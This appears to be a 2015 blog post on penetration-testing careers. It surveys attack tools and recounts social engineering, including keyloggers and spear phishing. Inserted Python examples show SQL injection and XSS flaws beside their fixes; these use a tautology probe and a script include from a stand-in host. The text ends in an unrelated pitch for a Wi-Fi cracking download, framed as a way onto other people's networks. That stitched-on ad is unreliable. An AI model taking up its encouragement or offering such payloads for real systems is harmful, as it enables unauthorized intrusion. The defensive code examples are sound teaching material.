So you want a job as a penetration tester or web application tester?

November 9, 2015

Website Application Testing

In today’s world there are typically two main types of offensive security professional. The first is the web application tester, who focuses primarily on weaknesses in web server applications such as cross-site scripting (XSS), SQL injection (SQLi), directory traversal, directory brute forcing, unlinked content manipulation, authentication bypass, brute forcing of weak passwords and of default passwords and configurations, cross-site request forgery (CSRF), HTTP injection and replay attacks.

Pursuing a career in this field will require you to master some great tools. The first is Burp Suite by PortSwigger; there are free and paid versions.

Burp Suite: Free version available for download at portswigger.net

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.

Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.

Burp Suite contains the following key components:

  • An intercepting Proxy, which lets you inspect and modify traffic between your browser and the target application.
  • An application-aware Spider, for crawling content and functionality.
  • An advanced web application Scanner, for automating the detection of numerous types of vulnerability.
  • An Intruder tool, for performing powerful customized attacks to find and exploit unusual vulnerabilities.
  • A Repeater tool, for manipulating and resending individual requests.
  • A Sequencer tool, for testing the randomness of session tokens.
  • The ability to save your work and resume working later.
  • Extensibility, allowing you to easily write your own plugins, to perform complex and highly customized tasks within Burp.
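The Sequencer item above is the one most people skip past, so here is the idea behind it as an added example (not PortSwigger's code): collect a sample of session tokens and measure how much each character position actually varies. The "weak" tokens are constructed to look like a counter with a fixed prefix; the "strong" ones come from the OS CSPRNG.

```python
"""Per-position entropy check for session tokens, a quick version of the kind of
assessment Burp's Sequencer performs. Added example, not PortSwigger's code."""
import math
import secrets
from collections import Counter

def weak_tokens(n=64):
    # Constructed: fixed prefix plus a counter, the shape of a predictable session id.
    return [f"SESS{100000 + i:06d}" for i in range(n)]

def strong_tokens(n=64):
    # 64 random bits per token from the OS CSPRNG, hex encoded (16 characters).
    return [secrets.token_hex(8) for _ in range(n)]

def position_entropy(tokens):
    """Shannon entropy (bits) of the character at each position across the sample."""
    if not tokens:
        raise ValueError("need at least one token")
    length = len(tokens[0])
    if any(len(t) != length for t in tokens):
        raise ValueError("tokens must all have the same length")
    n = len(tokens)
    entropies = []
    for pos in range(length):
        counts = Counter(t[pos] for t in tokens)
        entropies.append(-sum(c / n * math.log2(c / n) for c in counts.values()))
    return entropies

def assess(tokens, min_bits=1.0):
    """Summarise a sample: positions that barely vary, repeated tokens, and an
    upper bound on total entropy (positions are treated as independent, so
    correlated positions make the real figure lower than this)."""
    ent = position_entropy(tokens)
    return {
        "fixed_positions": [i for i, e in enumerate(ent) if e < min_bits],
        "duplicates": len(tokens) - len(set(tokens)),
        "total_bits": round(sum(ent), 2),
    }

if __name__ == "__main__":
    for label, sample in (("weak", weak_tokens()), ("strong", strong_tokens())):
        print(label, assess(sample))
```

A sample of 64 tokens is enough to expose a counter or a fixed prefix; it is not a substitute for Sequencer's full statistical tests, which need thousands of tokens.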

Sqlmap – Free download at sqlmap.org

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Havij – Free download at http://itsecteam.com/

Havij is an automated SQL injection tool that helps penetration testers find and exploit SQL injection vulnerabilities on a web page. Given a vulnerable web application, the user can fingerprint the back-end database, retrieve DBMS users and password hashes, dump tables and columns, fetch data from the database, run SQL statements and even access the underlying file system and execute commands on the operating system. What sets Havij apart from similar tools is its injection methods; its success rate is more than 95% at injecting vulnerable targets. The user-friendly GUI and automated settings and detection make it easy to use for everyone, even amateur users.

Havij is seen as a script kiddie tool, because the user does not have to follow the regular steps of SQL injection and can scan and exploit a site that relies on SQL in a matter of seconds. It is still, however, a useful tool that many hackers keep in their arsenal for quick attacks.
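Both sqlmap and Havij automate the discovery of one class of bug, so it helps to see the bug itself. This added example (not code from either tool) reproduces it against an in-memory SQLite login table: a check that splices input into the SQL text, beside the parameterised version that a tester would recommend in the report. The table contents and the probe string are constructed.

```python
"""SQL injection, vulnerable and fixed, against an in-memory SQLite table.
Added example, not part of sqlmap or Havij; data below is constructed."""
import sqlite3

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT NOT NULL, password TEXT NOT NULL)")
    # Constructed row. A real system stores a password hash, not the password.
    conn.execute("INSERT INTO users VALUES ('alice', 'correct-horse')")
    conn.commit()
    return conn

def login_vulnerable(conn, username, password):
    # Quote characters in the input become part of the statement, so whoever
    # controls the input can rewrite the WHERE condition.
    sql = (f"SELECT COUNT(*) FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone()[0] > 0

def login_safe(conn, username, password):
    # Placeholders: the driver passes the values separately from the SQL text,
    # so they are only ever compared as data, never parsed as SQL.
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0

# The classic tautology probe that injection scanners send first.
PROBE = "x' OR '1'='1"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable login:", login_vulnerable(db, "alice", PROBE))  # True
    print("safe login:      ", login_safe(db, "alice", PROBE))        # False
```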

Nikto – Free download at https://github.com/sullo/nikto

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/programs, checks for outdated versions of over 1250 servers, and version-specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files and HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be updated automatically.


Penetration Testing

True pen testing involves actually trying to exploit weaknesses and vulnerabilities in servers, networking infrastructure and workstations. Fewer companies and organizations therefore employ these types of teams, because attempting to exploit a server may crash it and have an operational impact on the business or organization.

If you look up job offerings for penetration testing you will typically see that they are offered on a contract basis, usually 6 to 12 months: you assess a network and, when finished, move on to your next project.

I have spent many years on the penetration testing side. One or two friends and I would take on a contract, charging about $250-$300 an hour. The contract would include the testing of all public-facing and internal assets of the company or organization. The test was not limited to information system testing but also included the exploitation of people through social engineering.

Social engineering was always my favorite part. First I would order shirts on Zazzle or CafePress that resembled those of the tech support staff at the location. If the company didn’t have any special identification, I would still try to fake something close to what they would expect. This part of the test was to see how many different places I could enter within the organization; every restricted place I could enter was a finding. The second part of the test was to see how many employees would grant me access to their workstations; I would typically say that we were doing an upgrade or that their machine needed to be patched, etc. This is where I would find sticky notes with logins and passwords (a finding) and, if the contract allowed, I would install my favorite device, a WiFi hardware keylogger:

KeyGhost and KeeLog both make great ones, which I’ve used close to a hundred times without ever being detected. I recommend checking them out.

I would also harvest as many e-mails and employee names as I could, and use them to make calls as tech support requesting passwords and system information. I would also send spear phishing e-mails using company logos, letterhead and signatures, trying to entice employees to give up credentials.

In the old days, around the late ’90s, my team had access to the latest 0-day exploits and things were far less organized. We could break into any server we wanted without the victim having any chance.

Here are the tools you need to master now:

Metasploit – Free version http://www.rapid7.com/products/metasploit/

The basic steps for using the Framework are:

  • Choosing and configuring an exploit (code that enters a target system by taking advantage of one of its bugs; about 900 different exploits for Windows, Unix/Linux and Mac OS X systems are included);
  • Optionally checking whether the intended target system is susceptible to the chosen exploit;
  • Choosing and configuring a payload (code that will be executed on the target system upon successful entry; for instance, a remote shell or a VNC server);
  • Choosing the encoding technique so that the intrusion-prevention system (IPS) ignores the encoded payload;
  • Executing the exploit.

This modular approach, allowing the combination of any exploit with any payload, is the major advantage of the Framework. It facilitates the tasks of attackers, exploit writers and payload writers.

Metasploit runs on Unix (including Linux and Mac OS X) and on Windows. The Metasploit Framework can be extended to use add-ons in multiple languages.

To choose an exploit and payload, some information about the target system is needed, such as operating system version and installed network services. This information can be gleaned with port scanning and OS fingerprinting tools such as Nmap. Vulnerability scanners such as Nexpose or Nessus can detect target system vulnerabilities. Metasploit can import vulnerability scan data and compare the identified vulnerabilities to existing exploit modules for accurate exploitation.

BeEF – The Browser Exploitation Framework Project – Free version https://github.com/beefproject/beef

The Browser Exploitation Framework (BeEF) is an open-source penetration testing tool used to test and exploit web application and browser-based vulnerabilities. BeEF provides the penetration tester with practical client-side attack vectors. It leverages web application and browser vulnerabilities to assess the security of a target and carry out further intrusions. The project is developed for lawful research and penetration testing; in practice, like many information security tools, BeEF is used for both legitimate and unauthorized activities.

BeEF hooks one or more web browsers as beachheads for the launching of directed command modules. Each browser is likely to be within a different security context, and each context may provide a set of unique attack vectors.

BeEF can be used to further exploit a cross-site scripting (XSS) flaw in a web application. The XSS flaw allows an attacker to inject BeEF JavaScript code into the vulnerable web page. In BeEF terminology, the browser that has visited the vulnerable page is “hooked”. The injected code in the hooked browser then responds to commands from the BeEF server. The BeEF server is a Ruby on Rails application that communicates with the hooked browser through a web-based user interface. BeEF comes with the BackTrack and Kali Linux distributions.

BeEF can be extended both through the extension API, which allows changes to the way BeEF itself works, and through addition of modules, which add features with which to control “hooked” browsers.
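The whole BeEF chain above depends on one thing: a page that puts attacker-controlled text into its markup unescaped. This added example (not part of the post or of BeEF) shows that rendering flaw beside the two defences a web application tester would ask for, output encoding and a Content-Security-Policy that refuses inline and off-origin script. The injected string and the hostname in it are constructed.

```python
"""Reflected XSS, the foothold a browser-hooking tool needs, next to output
escaping and a CSP header. Added example, not part of the post or of BeEF."""
import html

# Constructed: a script include pointing at a host the attacker controls.
INJECTED = '<script src="https://hook.example.invalid/hook.js"></script>'

def render_vulnerable(name):
    # The value is concatenated into the markup, so a <script> tag inside it
    # is parsed and executed by the visiting browser.
    return f"<p>Hello, {name}</p>"

def render_safe(name):
    # Escaping turns <, >, &, ' and " into entities; the browser displays the
    # text instead of creating a new element.
    return f"<p>Hello, {html.escape(name, quote=True)}</p>"

def security_headers():
    # Defence in depth for the place where escaping gets missed: no inline
    # script, scripts only from the page's own origin, no plugins, no <base>
    # rewriting, and the page cannot be framed.
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; "
                                   "object-src 'none'; base-uri 'none'; "
                                   "frame-ancestors 'none'",
        "X-Content-Type-Options": "nosniff",
    }

def has_script_tag(markup):
    # Minimal check used in the tests: does a live <script element survive?
    return "<script" in markup.lower()

if __name__ == "__main__":
    print(render_vulnerable(INJECTED))
    print(render_safe(INJECTED))
    print(security_headers()["Content-Security-Policy"])
```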

How to Hack WiFi Password (WEP/WPA/WPA2)

An internet connection has become a basic necessity in modern life. Wireless hotspots (commonly known as Wi-Fi) can be found everywhere! If you have a PC with a wireless network card, you must have seen many networks around you. Sadly, most of these networks are secured with a network security key. Have you ever wanted to use one of them? You must have desperately wanted to check your mail when you moved into your new house. The hardest time in your life is when your internet connection is down. Hacking those Wi-Fi passwords is your answer to temporary internet access.

Now, to hack a Wi-Fi password you must first know what type of encryption the network uses. There are several types, such as WEP (the easiest to crack), WPA and WPA2.

Luckily for you, we developed a program that automates the whole hacking process; the only thing you need to do is click buttons and wait.

How does it work?

To fully understand how this program works you would most likely need a few months first to learn the fundamentals of programming. After that you would probably need a few more years (depending on how fast a learner you are) to completely understand how it functions. But in short, it scans for available wireless networks in your range and contacts them; once contact is established it receives packets, and once the packets are received it decrypts them, meaning it recovers the password with a tool built into our application. Some wireless networks can be hacked in moments, some take a few minutes, and very rarely it takes hours. This depends on how the victim’s password is made. Many that are difficult to hack are made of letters (uppercase and lowercase), numbers and special characters. Naturally, many of them are made only of letters, and can be hacked extremely quickly.

What security types / encryptions does the software hack?

The software can hack the following encryptions / security types:
– WEP
– WPA
– WPA2

Available for download at http://www.wifi-hacker.org/download.php
